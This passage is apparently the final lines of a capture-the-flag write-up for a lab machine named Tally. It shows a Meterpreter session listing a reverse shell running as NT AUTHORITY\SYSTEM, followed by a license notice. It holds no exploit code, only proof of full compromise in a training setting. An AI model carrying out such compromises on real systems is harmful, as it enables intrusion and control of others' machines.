5 meterpreter x64/windows NT AUTHORITY\SYSTEM @ TALLY 10.10.14.14:1234 -> 10.10.10.59:49947 (10.10.10.59)
This post is licensed under CC BY 4.0 by the author.